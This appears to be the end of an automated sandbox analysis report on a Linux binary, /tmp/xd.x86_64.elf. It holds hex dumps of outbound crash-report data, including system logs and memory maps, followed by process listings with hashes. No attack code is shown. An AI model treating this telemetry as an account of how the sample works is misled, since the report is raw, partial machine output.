                                                    2025-04-02 18:48:34 UTC16384OUTData Raw: 74 75 34 2e 31 0a 6c 69 62 70 61 6d 2d 72 75 6e 74 69 6d 65 20 31 2e 33 2e 31 2d 35 75 62 75 6e 74 75 34 2e 31 0a 6c 69 62 70 61 6d 2d 73 79 73 74 65 6d 64 20 32 34 35 2e 34 2d 34 75 62 75 6e 74 75 33 2e 31 31 0a 6c 69 62 70 61 6d 30 67 20 31 2e 33 2e 31 2d 35 75 62 75 6e 74 75 34 2e 31 0a 6c 69 62 70 61 6e 67 6f 2d 31 2e 30 2d 30 20 31 2e 34 34 2e 37 2d 32 75 62 75 6e 74 75 34 0a 6c 69 62 70 61 6e 67 6f 63 61 69 72 6f 2d 31 2e 30 2d 30 20 31 2e 34 34 2e 37 2d 32 75 62 75 6e 74 75 34 0a 6c 69 62 70 61 6e 67 6f 66 74 32 2d 31 2e 30 2d 30 20 31 2e 34 34 2e 37 2d 32 75 62 75 6e 74 75 34 0a 6c 69 62 70 61 6e 67 6f 78 66 74 2d 31 2e 30 2d 30 20 31 2e 34 34 2e 37 2d 32 75 62 75 6e 74 75 34 0a 6c 69 62 70 61 70 65 72 2d 75 74 69 6c 73 20 31 2e 31 2e 32 38 0a 6c
                                                    Data Ascii: tu4.1libpam-runtime 1.3.1-5ubuntu4.1libpam-systemd 245.4-4ubuntu3.11libpam0g 1.3.1-5ubuntu4.1libpango-1.0-0 1.44.7-2ubuntu4libpangocairo-1.0-0 1.44.7-2ubuntu4libpangoft2-1.0-0 1.44.7-2ubuntu4libpangoxft-1.0-0 1.44.7-2ubuntu4libpaper-utils 1.1.28l
                                                    2025-04-02 18:48:34 UTC16384OUTData Raw: 20 20 20 20 20 20 20 20 30 78 30 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 30 0a 67 73 20 20 20 20 20 20 20 20 20 20 20 20 20 30 78 30 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 30 0a 6b 30 20 20 20 20 20 20 20 20 20 20 20 20 20 30 78 30 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 30 0a 6b 31 20 20 20 20 20 20 20 20 20 20 20 20 20 30 78 30 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 30 0a 6b 32 20 20 20 20 20 20 20 20 20 20 20 20 20 30 78 30 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 30 0a 6b 33 20 20 20 20 20 20 20 20 20 20 20 20 20 30 78 30 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 30 0a 6b 34 20 20 20 20 20 20 20 20 20 20 20 20 20 30 78 30 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 30 0a 6b 35 20
                                                    Data Ascii: 0x0 0gs 0x0 0k0 0x0 0k1 0x0 0k2 0x0 0k3 0x0 0k4 0x0 0k5
                                                    2025-04-02 18:48:34 UTC16384OUTData Raw: 20 20 20 20 20 20 20 20 20 2f 75 73 72 2f 6c 69 62 2f 78 38 36 5f 36 34 2d 6c 69 6e 75 78 2d 67 6e 75 2f 6c 69 62 78 63 62 2d 72 65 6e 64 65 72 2e 73 6f 2e 30 2e 30 2e 30 0a 37 66 37 39 31 63 30 37 34 30 30 30 2d 37 66 37 39 31 63 30 37 35 30 30 30 20 2d 2d 2d 70 20 30 30 30 30 63 30 30 30 20 66 64 3a 30 30 20 38 30 36 32 36 30 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2f 75 73 72 2f 6c 69 62 2f 78 38 36 5f 36 34 2d 6c 69 6e 75 78 2d 67 6e 75 2f 6c 69 62 78 63 62 2d 72 65 6e 64 65 72 2e 73 6f 2e 30 2e 30 2e 30 0a 37 66 37 39 31 63 30 37 35 30 30 30 2d 37 66 37 39 31 63 30 37 36 30 30 30 20 72 2d 2d 70 20 30 30 30 30 63 30 30 30 20 66 64 3a 30 30 20 38 30 36 32 36 30 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2f 75
                                                    Data Ascii: /usr/lib/x86_64-linux-gnu/libxcb-render.so.0.0.07f791c074000-7f791c075000 ---p 0000c000 fd:00 806260 /usr/lib/x86_64-linux-gnu/libxcb-render.so.0.0.07f791c075000-7f791c076000 r--p 0000c000 fd:00 806260 /u
                                                    2025-04-02 18:48:34 UTC16384OUTData Raw: 6e 75 78 2d 67 6e 75 2f 6c 69 62 67 64 6b 5f 70 69 78 62 75 66 2d 32 2e 30 2e 73 6f 2e 30 2e 34 30 30 30 2e 30 0a 37 66 37 39 31 63 37 37 33 30 30 30 2d 37 66 37 39 31 63 37 37 34 30 30 30 20 72 77 2d 70 20 30 30 30 32 36 30 30 30 20 66 64 3a 30 30 20 38 30 36 32 34 35 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2f 75 73 72 2f 6c 69 62 2f 78 38 36 5f 36 34 2d 6c 69 6e 75 78 2d 67 6e 75 2f 6c 69 62 67 64 6b 5f 70 69 78 62 75 66 2d 32 2e 30 2e 73 6f 2e 30 2e 34 30 30 30 2e 30 0a 37 66 37 39 31 63 37 37 34 30 30 30 2d 37 66 37 39 31 63 37 37 38 30 30 30 20 72 2d 2d 70 20 30 30 30 30 30 30 30 30 20 66 64 3a 30 30 20 38 30 36 32 36 38 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2f 75 73 72 2f 6c 69 62 2f 78 38 36 5f 36 34
                                                    Data Ascii: nux-gnu/libgdk_pixbuf-2.0.so.0.4000.07f791c773000-7f791c774000 rw-p 00026000 fd:00 806245 /usr/lib/x86_64-linux-gnu/libgdk_pixbuf-2.0.so.0.4000.07f791c774000-7f791c778000 r--p 00000000 fd:00 806268 /usr/lib/x86_64
                                                    2025-04-02 18:48:34 UTC16384OUTData Raw: 20 70 6c 61 74 66 6f 72 6d 20 65 69 73 61 2e 30 3a 20 43 61 6e 6e 6f 74 20 61 6c 6c 6f 63 61 74 65 20 72 65 73 6f 75 72 63 65 20 66 6f 72 20 45 49 53 41 20 73 6c 6f 74 20 37 0a 41 75 67 20 31 37 20 32 30 3a 32 34 3a 34 36 20 67 61 6c 61 73 73 69 61 20 6b 65 72 6e 65 6c 3a 20 70 6c 61 74 66 6f 72 6d 20 65 69 73 61 2e 30 3a 20 43 61 6e 6e 6f 74 20 61 6c 6c 6f 63 61 74 65 20 72 65 73 6f 75 72 63 65 20 66 6f 72 20 45 49 53 41 20 73 6c 6f 74 20 38 0a 41 75 67 20 31 37 20 32 30 3a 32 34 3a 34 36 20 67 61 6c 61 73 73 69 61 20 6b 65 72 6e 65 6c 3a 20 73 64 20 33 32 3a 30 3a 30 3a 30 3a 20 5b 73 64 61 5d 20 41 73 73 75 6d 69 6e 67 20 64 72 69 76 65 20 63 61 63 68 65 3a 20 77 72 69 74 65 20 74 68 72 6f 75 67 68 0a 41 75 67 20 31 37 20 32 30 3a 32 34 3a 34 37 20 67
                                                    Data Ascii: platform eisa.0: Cannot allocate resource for EISA slot 7Aug 17 20:24:46 galassia kernel: platform eisa.0: Cannot allocate resource for EISA slot 8Aug 17 20:24:46 galassia kernel: sd 32:0:0:0: [sda] Assuming drive cache: write throughAug 17 20:24:47 g
                                                    2025-04-02 18:48:34 UTC16384OUTData Raw: 35 35 31 5d 3a 20 28 49 49 29 20 4c 6f 61 64 4d 6f 64 75 6c 65 3a 20 22 66 62 64 65 76 68 77 22 0a 41 75 67 20 31 37 20 32 30 3a 32 35 3a 30 34 20 67 61 6c 61 73 73 69 61 20 2f 75 73 72 2f 6c 69 62 2f 67 64 6d 33 2f 67 64 6d 2d 78 2d 73 65 73 73 69 6f 6e 5b 31 35 35 31 5d 3a 20 28 49 49 29 20 4c 6f 61 64 69 6e 67 20 2f 75 73 72 2f 6c 69 62 2f 78 6f 72 67 2f 6d 6f 64 75 6c 65 73 2f 6c 69 62 66 62 64 65 76 68 77 2e 73 6f 0a 41 75 67 20 31 37 20 32 30 3a 32 35 3a 30 34 20 67 61 6c 61 73 73 69 61 20 2f 75 73 72 2f 6c 69 62 2f 67 64 6d 33 2f 67 64 6d 2d 78 2d 73 65 73 73 69 6f 6e 5b 31 35 35 31 5d 3a 20 28 49 49 29 20 4d 6f 64 75 6c 65 20 66 62 64 65 76 68 77 3a 20 76 65 6e 64 6f 72 3d 22 58 2e 4f 72 67 20 46 6f 75 6e 64 61 74 69 6f 6e 22 0a 41 75 67 20 31 37
                                                    Data Ascii: 551]: (II) LoadModule: "fbdevhw"Aug 17 20:25:04 galassia /usr/lib/gdm3/gdm-x-session[1551]: (II) Loading /usr/lib/xorg/modules/libfbdevhw.soAug 17 20:25:04 galassia /usr/lib/gdm3/gdm-x-session[1551]: (II) Module fbdevhw: vendor="X.Org Foundation"Aug 17
                                                    2025-04-02 18:48:34 UTC16384OUTData Raw: 2f 6c 69 62 2f 67 64 6d 33 2f 67 64 6d 2d 78 2d 73 65 73 73 69 6f 6e 5b 31 35 35 31 5d 3a 20 28 49 49 29 20 76 6d 77 61 72 65 28 30 29 3a 20 4e 6f 74 20 75 73 69 6e 67 20 64 65 66 61 75 6c 74 20 6d 6f 64 65 20 22 31 39 32 30 78 31 32 30 30 22 20 28 69 6e 73 75 66 66 69 63 69 65 6e 74 20 6d 65 6d 6f 72 79 20 66 6f 72 20 6d 6f 64 65 29 0a 41 75 67 20 31 37 20 32 30 3a 32 35 3a 30 35 20 67 61 6c 61 73 73 69 61 20 2f 75 73 72 2f 6c 69 62 2f 67 64 6d 33 2f 67 64 6d 2d 78 2d 73 65 73 73 69 6f 6e 5b 31 35 35 31 5d 3a 20 28 49 49 29 20 76 6d 77 61 72 65 28 30 29 3a 20 4e 6f 74 20 75 73 69 6e 67 20 64 65 66 61 75 6c 74 20 6d 6f 64 65 20 22 39 36 30 78 36 30 30 22 20 28 62 61 64 20 6d 6f 64 65 20 63 6c 6f 63 6b 2f 69 6e 74 65 72 6c 61 63 65 2f 64 6f 75 62 6c 65 73
                                                    Data Ascii: /lib/gdm3/gdm-x-session[1551]: (II) vmware(0): Not using default mode "1920x1200" (insufficient memory for mode)Aug 17 20:25:05 galassia /usr/lib/gdm3/gdm-x-session[1551]: (II) vmware(0): Not using default mode "960x600" (bad mode clock/interlace/doubles
                                                    2025-04-02 18:48:34 UTC16384OUTData Raw: 20 31 33 33 36 20 31 35 32 30 20 20 38 36 34 20 38 36 35 20 38 36 38 20 38 39 35 20 2d 68 73 79 6e 63 20 2b 76 73 79 6e 63 20 28 35 33 2e 37 20 6b 48 7a 20 64 29 0a 41 75 67 20 31 37 20 32 30 3a 32 35 3a 30 35 20 67 61 6c 61 73 73 69 61 20 2f 75 73 72 2f 6c 69 62 2f 67 64 6d 33 2f 67 64 6d 2d 78 2d 73 65 73 73 69 6f 6e 5b 31 35 35 31 5d 3a 20 28 2a 2a 29 20 76 6d 77 61 72 65 28 30 29 3a 20 20 44 65 66 61 75 6c 74 20 6d 6f 64 65 20 22 31 30 32 34 78 37 36 38 22 3a 20 39 34 2e 35 20 4d 48 7a 2c 20 36 38 2e 37 20 6b 48 7a 2c 20 38 35 2e 30 20 48 7a 0a 41 75 67 20 31 37 20 32 30 3a 32 35 3a 30 35 20 67 61 6c 61 73 73 69 61 20 2f 75 73 72 2f 6c 69 62 2f 67 64 6d 33 2f 67 64 6d 2d 78 2d 73 65 73 73 69 6f 6e 5b 31 35 35 31 5d 3a 20 28 49 49 29 20 76 6d 77 61 72
                                                    Data Ascii: 1336 1520 864 865 868 895 -hsync +vsync (53.7 kHz d)Aug 17 20:25:05 galassia /usr/lib/gdm3/gdm-x-session[1551]: (**) vmware(0): Default mode "1024x768": 94.5 MHz, 68.7 kHz, 85.0 HzAug 17 20:25:05 galassia /usr/lib/gdm3/gdm-x-session[1551]: (II) vmwar
                                                    2025-04-02 18:48:34 UTC16384OUTData Raw: 65 64 20 53 65 74 20 32 20 6b 65 79 62 6f 61 72 64 3a 20 61 6c 77 61 79 73 20 72 65 70 6f 72 74 73 20 63 6f 72 65 20 65 76 65 6e 74 73 0a 41 75 67 20 31 37 20 32 30 3a 32 35 3a 30 35 20 67 61 6c 61 73 73 69 61 20 2f 75 73 72 2f 6c 69 62 2f 67 64 6d 33 2f 67 64 6d 2d 78 2d 73 65 73 73 69 6f 6e 5b 31 35 35 31 5d 3a 20 28 2a 2a 29 20 4f 70 74 69 6f 6e 20 22 44 65 76 69 63 65 22 20 22 2f 64 65 76 2f 69 6e 70 75 74 2f 65 76 65 6e 74 31 22 0a 41 75 67 20 31 37 20 32 30 3a 32 35 3a 30 35 20 67 61 6c 61 73 73 69 61 20 2f 75 73 72 2f 6c 69 62 2f 67 64 6d 33 2f 67 64 6d 2d 78 2d 73 65 73 73 69 6f 6e 5b 31 35 35 31 5d 3a 20 28 2a 2a 29 20 4f 70 74 69 6f 6e 20 22 5f 73 6f 75 72 63 65 22 20 22 73 65 72 76 65 72 2f 75 64 65 76 22 0a 41 75 67 20 31 37 20 32 30 3a 32 35
                                                    Data Ascii: ed Set 2 keyboard: always reports core eventsAug 17 20:25:05 galassia /usr/lib/gdm3/gdm-x-session[1551]: (**) Option "Device" "/dev/input/event1"Aug 17 20:25:05 galassia /usr/lib/gdm3/gdm-x-session[1551]: (**) Option "_source" "server/udev"Aug 17 20:25
                                                    2025-04-02 18:48:34 UTC279INHTTP/1.1 400 Bad Request
                                                    Date: Wed, 02 Apr 2025 18:48:34 GMT
                                                    Server: gunicorn/19.7.1
                                                    X-Daisy-Revision-Number: 979
                                                    X-Oops-Repository-Version: 0.0.0
                                                    Strict-Transport-Security: max-age=2592000
                                                    Connection: close
                                                    Transfer-Encoding: chunked
                                                    17
                                                    Crash already reported.
                                                    0


                                                    System Behavior

                                                    General

                                                    Start time (UTC):18:48:01
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/dash
                                                    Arguments:-
                                                    File size:129816 bytes
                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                    Process Activities


                                                    General

                                                    Start time (UTC):18:48:01
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/rm
                                                    Arguments:rm -f /tmp/tmp.HvEmy83FD7 /tmp/tmp.9Ut2ilLg4K /tmp/tmp.o2saWRiF1e
                                                    File size:72056 bytes
                                                    MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                                    File Activities


                                                    General

                                                    Start time (UTC):18:48:01
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/dash
                                                    Arguments:-
                                                    File size:129816 bytes
                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                    Process Activities


                                                    General

                                                    Start time (UTC):18:48:01
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/cat
                                                    Arguments:cat /tmp/tmp.HvEmy83FD7
                                                    File size:43416 bytes
                                                    MD5 hash:7e9d213e404ad3bb82e4ebb2e1f2c1b3

                                                    File Activities


                                                    General

                                                    Start time (UTC):18:48:01
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/dash
                                                    Arguments:-
                                                    File size:129816 bytes
                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                    Process Activities


                                                    General

                                                    Start time (UTC):18:48:01
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/head
                                                    Arguments:head -n 10
                                                    File size:47480 bytes
                                                    MD5 hash:fd96a67145172477dd57131396fc9608

                                                    File Activities


                                                    General

                                                    Start time (UTC):18:48:01
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/dash
                                                    Arguments:-
                                                    File size:129816 bytes
                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                    Process Activities


                                                    General

                                                    Start time (UTC):18:48:01
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/tr
                                                    Arguments:tr -d \\000-\\011\\013\\014\\016-\\037
                                                    File size:51544 bytes
                                                    MD5 hash:fbd1402dd9f72d8ebfff00ce7c3a7bb5

                                                    File Activities


                                                    General

                                                    Start time (UTC):18:48:01
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/dash
                                                    Arguments:-
                                                    File size:129816 bytes
                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                    Process Activities


                                                    General

                                                    Start time (UTC):18:48:01
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/cut
                                                    Arguments:cut -c -80
                                                    File size:47480 bytes
                                                    MD5 hash:d8ed0ea8f22c0de0f8692d4d9f1759d3

                                                    File Activities


                                                    General

                                                    Start time (UTC):18:48:01
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/dash
                                                    Arguments:-
                                                    File size:129816 bytes
                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                    Process Activities


                                                    General

                                                    Start time (UTC):18:48:01
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/cat
                                                    Arguments:cat /tmp/tmp.HvEmy83FD7
                                                    File size:43416 bytes
                                                    MD5 hash:7e9d213e404ad3bb82e4ebb2e1f2c1b3

                                                    File Activities


                                                    General

                                                    Start time (UTC):18:48:01
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/dash
                                                    Arguments:-
                                                    File size:129816 bytes
                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                    Process Activities


                                                    General

                                                    Start time (UTC):18:48:01
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/head
                                                    Arguments:head -n 10
                                                    File size:47480 bytes
                                                    MD5 hash:fd96a67145172477dd57131396fc9608

                                                    File Activities


                                                    General

                                                    Start time (UTC):18:48:01
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/dash
                                                    Arguments:-
                                                    File size:129816 bytes
                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                    Process Activities


                                                    General

                                                    Start time (UTC):18:48:01
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/tr
                                                    Arguments:tr -d \\000-\\011\\013\\014\\016-\\037
                                                    File size:51544 bytes
                                                    MD5 hash:fbd1402dd9f72d8ebfff00ce7c3a7bb5

                                                    File Activities


                                                    General

                                                    Start time (UTC):18:48:01
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/dash
                                                    Arguments:-
                                                    File size:129816 bytes
                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                    Process Activities


                                                    General

                                                    Start time (UTC):18:48:01
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/cut
                                                    Arguments:cut -c -80
                                                    File size:47480 bytes
                                                    MD5 hash:d8ed0ea8f22c0de0f8692d4d9f1759d3

                                                    File Activities


                                                    General

                                                    Start time (UTC):18:48:02
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/dash
                                                    Arguments:-
                                                    File size:129816 bytes
                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                    Process Activities


                                                    General

                                                    Start time (UTC):18:48:02
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/rm
                                                    Arguments:rm -f /tmp/tmp.HvEmy83FD7 /tmp/tmp.9Ut2ilLg4K /tmp/tmp.o2saWRiF1e
                                                    File size:72056 bytes
                                                    MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                                    File Activities


                                                    General

                                                    Start time (UTC):18:48:06
                                                    Start date (UTC):02/04/2025
                                                    Path:/tmp/xd.x86_64.elf
                                                    Arguments:/tmp/xd.x86_64.elf
                                                    File size:38924 bytes
                                                    MD5 hash:e59bf6760fd1be7b7fdb51b0c8038c27

                                                    File Activities

                                                    Process Activities

                                                    Network Activities


                                                    General

                                                    Start time (UTC):18:48:06
                                                    Start date (UTC):02/04/2025
                                                    Path:/tmp/xd.x86_64.elf
                                                    Arguments:-
                                                    File size:38924 bytes
                                                    MD5 hash:e59bf6760fd1be7b7fdb51b0c8038c27

                                                    File Activities

                                                    Process Activities

                                                    Network Activities


                                                    General

                                                    Start time (UTC):18:48:06
                                                    Start date (UTC):02/04/2025
                                                    Path:/tmp/xd.x86_64.elf
                                                    Arguments:-
                                                    File size:38924 bytes
                                                    MD5 hash:e59bf6760fd1be7b7fdb51b0c8038c27

                                                    File Activities


                                                    General

                                                    Start time (UTC):18:48:06
                                                    Start date (UTC):02/04/2025
                                                    Path:/tmp/xd.x86_64.elf
                                                    Arguments:-
                                                    File size:38924 bytes
                                                    MD5 hash:e59bf6760fd1be7b7fdb51b0c8038c27

                                                    File Activities

                                                    Process Activities

                                                    Network Activities


                                                    General

                                                    Start time (UTC):18:48:06
                                                    Start date (UTC):02/04/2025
                                                    Path:/tmp/xd.x86_64.elf
                                                    Arguments:-
                                                    File size:38924 bytes
                                                    MD5 hash:e59bf6760fd1be7b7fdb51b0c8038c27

                                                    File Activities


                                                    General

                                                    Start time (UTC):18:48:07
                                                    Start date (UTC):02/04/2025
                                                    Path:/tmp/xd.x86_64.elf
                                                    Arguments:-
                                                    File size:38924 bytes
                                                    MD5 hash:e59bf6760fd1be7b7fdb51b0c8038c27

                                                    File Activities


                                                    General

                                                    Start time (UTC):18:48:07
                                                    Start date (UTC):02/04/2025
                                                    Path:/tmp/xd.x86_64.elf
                                                    Arguments:-
                                                    File size:38924 bytes
                                                    MD5 hash:e59bf6760fd1be7b7fdb51b0c8038c27

                                                    Network Activities


                                                    General

                                                    Start time (UTC):18:48:07
                                                    Start date (UTC):02/04/2025
                                                    Path:/tmp/xd.x86_64.elf
                                                    Arguments:-
                                                    File size:38924 bytes
                                                    MD5 hash:e59bf6760fd1be7b7fdb51b0c8038c27

                                                    General

                                                    Start time (UTC):18:48:17
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/lib/systemd/systemd
                                                    Arguments:-
                                                    File size:1620224 bytes
                                                    MD5 hash:9b2bec7092a40488108543f9334aab75

                                                    Process Activities


                                                    General

                                                    Start time (UTC):18:48:17
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/journalctl
                                                    Arguments:/usr/bin/journalctl --smart-relinquish-var
                                                    File size:80120 bytes
                                                    MD5 hash:bf3a987344f3bacafc44efd882abda8b

                                                    File Activities

                                                    Process Activities


                                                    General

                                                    Start time (UTC):18:48:18
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/lib/systemd/systemd
                                                    Arguments:-
                                                    File size:1620224 bytes
                                                    MD5 hash:9b2bec7092a40488108543f9334aab75

                                                    File Activities

                                                    Process Activities

                                                    Network Activities


                                                    General

                                                    Start time (UTC):18:48:18
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/lib/systemd/systemd
                                                    Arguments:-
                                                    File size:1620224 bytes
                                                    MD5 hash:9b2bec7092a40488108543f9334aab75

                                                    File Activities

                                                    Process Activities

                                                    Network Activities


                                                    General

                                                    Start time (UTC):18:48:18
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/lib/systemd/systemd
                                                    Arguments:-
                                                    File size:1620224 bytes
                                                    MD5 hash:9b2bec7092a40488108543f9334aab75

                                                    File Activities

                                                    Process Activities

                                                    Network Activities


                                                    General

                                                    Start time (UTC):18:48:18
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/lib/systemd/systemd
                                                    Arguments:-
                                                    File size:1620224 bytes
                                                    MD5 hash:9b2bec7092a40488108543f9334aab75

                                                    File Activities

                                                    Process Activities

                                                    Network Activities


                                                    General

                                                    Start time (UTC):18:48:18
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/lib/systemd/systemd
                                                    Arguments:-
                                                    File size:1620224 bytes
                                                    MD5 hash:9b2bec7092a40488108543f9334aab75

                                                    File Activities

                                                    Process Activities

                                                    Network Activities


                                                    General

                                                    Start time (UTC):18:48:29
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/lib/systemd/systemd
                                                    Arguments:-
                                                    File size:1620224 bytes
                                                    MD5 hash:9b2bec7092a40488108543f9334aab75

                                                    File Activities

                                                    Process Activities

                                                    Network Activities


                                                    General

                                                    Start time (UTC):18:48:30
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/lib/systemd/systemd
                                                    Arguments:-
                                                    File size:1620224 bytes
                                                    MD5 hash:9b2bec7092a40488108543f9334aab75

                                                    File Activities

                                                    Process Activities

                                                    Network Activities


                                                    General

                                                    Start time (UTC):18:48:30
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/lib/systemd/systemd
                                                    Arguments:-
                                                    File size:1620224 bytes
                                                    MD5 hash:9b2bec7092a40488108543f9334aab75

                                                    File Activities

                                                    Process Activities

                                                    Network Activities


                                                    General

                                                    Start time (UTC):18:48:30
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/lib/systemd/systemd
                                                    Arguments:-
                                                    File size:1620224 bytes
                                                    MD5 hash:9b2bec7092a40488108543f9334aab75

                                                    File Activities

                                                    Process Activities

                                                    Network Activities


                                                    General

                                                    Start time (UTC):18:48:30
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/lib/systemd/systemd
                                                    Arguments:-
                                                    File size:1620224 bytes
                                                    MD5 hash:9b2bec7092a40488108543f9334aab75

                                                    File Activities

                                                    Process Activities

                                                    Network Activities


                                                    General

                                                    Start time (UTC):18:48:30
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/lib/systemd/systemd
                                                    Arguments:-
                                                    File size:1620224 bytes
                                                    MD5 hash:9b2bec7092a40488108543f9334aab75

                                                    Process Activities


                                                    General

                                                    Start time (UTC):18:48:30
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/pulseaudio
                                                    Arguments:/usr/bin/pulseaudio --daemonize=no --log-target=journal
                                                    File size:100832 bytes
                                                    MD5 hash:0c3b4c789d8ffb12b25507f27e14c186

                                                    File Activities

                                                    Process Activities

                                                    System Activities

                                                    Network Activities


                                                    General

                                                    Start time (UTC):18:48:30
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/sbin/gdm3
                                                    Arguments:-
                                                    File size:453296 bytes
                                                    MD5 hash:2492e2d8d34f9377e3e530a61a15674f

                                                    Process Activities


                                                    General

                                                    Start time (UTC):18:48:30
                                                    Start date (UTC):02/04/2025
                                                    Path:/etc/gdm3/PrimeOff/Default
                                                    Arguments:/etc/gdm3/PrimeOff/Default
                                                    File size:129816 bytes
                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                    File Activities


                                                    General

                                                    Start time (UTC):18:48:30
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/sbin/gdm3
                                                    Arguments:-
                                                    File size:453296 bytes
                                                    MD5 hash:2492e2d8d34f9377e3e530a61a15674f

                                                    Process Activities


                                                    General

                                                    Start time (UTC):18:48:30
                                                    Start date (UTC):02/04/2025
                                                    Path:/etc/gdm3/PrimeOff/Default
                                                    Arguments:/etc/gdm3/PrimeOff/Default
                                                    File size:129816 bytes
                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                    File Activities


                                                    General

                                                    Start time (UTC):18:48:30
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/sbin/gdm3
                                                    Arguments:-
                                                    File size:453296 bytes
                                                    MD5 hash:2492e2d8d34f9377e3e530a61a15674f

                                                    Process Activities


                                                    General

                                                    Start time (UTC):18:48:30
                                                    Start date (UTC):02/04/2025
                                                    Path:/etc/gdm3/PrimeOff/Default
                                                    Arguments:/etc/gdm3/PrimeOff/Default
                                                    File size:129816 bytes
                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                    File Activities


                                                    General

                                                    Start time (UTC):18:48:31
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/lib/systemd/systemd
                                                    Arguments:-
                                                    File size:1620224 bytes
                                                    MD5 hash:9b2bec7092a40488108543f9334aab75

                                                    Process Activities


                                                    General

                                                    Start time (UTC):18:48:31
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/gpu-manager
                                                    Arguments:/usr/bin/gpu-manager --log /var/log/gpu-manager.log
                                                    File size:76616 bytes
                                                    MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

                                                    File Activities

                                                    Process Activities

                                                    System Activities


                                                    General

                                                    Start time (UTC):18:48:31
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/gpu-manager
                                                    Arguments:-
                                                    File size:76616 bytes
                                                    MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

                                                    Process Activities


                                                    General

                                                    Start time (UTC):18:48:31
                                                    Start date (UTC):02/04/2025
                                                    Path:/bin/sh
                                                    Arguments:sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /etc/modprobe.d/*.conf"
                                                    File size:129816 bytes
                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                    File Activities

                                                    Process Activities


                                                    General

                                                    Start time (UTC):18:48:31
                                                    Start date (UTC):02/04/2025
                                                    Path:/bin/sh
                                                    Arguments:-
                                                    File size:129816 bytes
                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                    Process Activities


                                                    General

                                                    Start time (UTC):18:48:31
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/grep
                                                    Arguments:grep -G ^blacklist.*nvidia[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
